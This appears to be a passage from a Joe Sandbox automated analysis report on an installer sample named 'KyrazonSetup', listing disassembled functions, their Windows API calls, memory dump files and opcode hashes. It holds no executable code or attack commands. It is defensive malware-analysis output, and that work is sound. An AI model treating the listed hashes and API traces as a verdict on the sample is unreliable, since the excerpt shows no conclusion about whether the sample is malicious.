                                                                                      • Opcode Fuzzy Hash: e2fce6cb7e4bd878bb855d9d4782e23046200841727912eee4ccc09af04f40ce
                                                                                      • Instruction Fuzzy Hash: 36C012B050470096C5607F749E8F6093E556B41735B744735F0B8B60F1C77C8659955E
                                                                                      Function 0040560A Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,00485000,00485000,00485000,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                      • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                                                                                      • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                      • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                                                                                      Function 00405E54 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                                                                                      Function 00405BE0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,0041E028,000000FF,0041E028,000000FF,000000FF,00000004,00000000), ref: 00405BF4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                      • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                                                                                      • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                      • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                                                                                      Function 00405BB1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                                      • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                                                                                      • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                                      • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                                                                                      Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Remove folder: ), ref: 00405E4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                                                                                      Function 0040403F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetDlgItemTextA.USER32(?,?,00000000), ref: 00404059
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText
                                                                                      • String ID:
                                                                                      • API String ID: 3367045223-0
                                                                                      • Opcode ID: a0a78e1bf6a6b29a50df979bec23ba929f6ba3d1fc8fcf0d14566fab2b8853c2
                                                                                      • Instruction ID: bf62610f610bba90556bdcd31abde1078def355814f7361e89583e93c2f26f86
                                                                                      • Opcode Fuzzy Hash: a0a78e1bf6a6b29a50df979bec23ba929f6ba3d1fc8fcf0d14566fab2b8853c2
                                                                                      • Instruction Fuzzy Hash: C2C04C79148700BFD641A755CD42F1FB7EDEF94315F40C92EB19CA11D1C63988209A26
                                                                                      Function 0040408B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: fcb410e73ff28c7c721615f2d1b76ecbcc08593dfa481273694f1ab80d680dea
                                                                                      • Instruction ID: dc0fe9f2873b1b31caed9ffec69b67f1cbb85c05ef5e40ff43161b5d97c3bfec
                                                                                      • Opcode Fuzzy Hash: fcb410e73ff28c7c721615f2d1b76ecbcc08593dfa481273694f1ab80d680dea
                                                                                      • Instruction Fuzzy Hash: B2C04C756407006AEA218B51DD49F0677946750B40F1484397750F60D4C674E410DA1C
                                                                                      Function 00404074 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 90995640d780f78d936646df3698c534cf74dc81456e4980755a566d6583aa34
                                                                                      • Instruction ID: b93e40128d6e1c948692e866e7dcbda031b9d08d342489ec85e58d85114fe036
                                                                                      • Opcode Fuzzy Hash: 90995640d780f78d936646df3698c534cf74dc81456e4980755a566d6583aa34
                                                                                      • Instruction Fuzzy Hash: F5B09235180A00AAEA114B00DF09F457A62A765702F008029B240290B2CAB240A1DB18
                                                                                      Function 004031C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                      Function 00404061 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 159f684cd445e5a2b3f46bb25231c0e6912f9c15cd91e73ad93280acd2a5eeec
                                                                                      • Instruction ID: c5b275790591b6ea279e9aaaff24a81262f30180438a09f86821f4bd36946bfb
                                                                                      • Opcode Fuzzy Hash: 159f684cd445e5a2b3f46bb25231c0e6912f9c15cd91e73ad93280acd2a5eeec
                                                                                      • Instruction Fuzzy Hash: 75A00176404141EBDB069F90EF48D4ABF72EBA4B05B129439A295A40368A324871FF2D

                                                                                      Non-executed Functions

                                                                                      Function 00404A44 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404A67
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                                                                                      • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
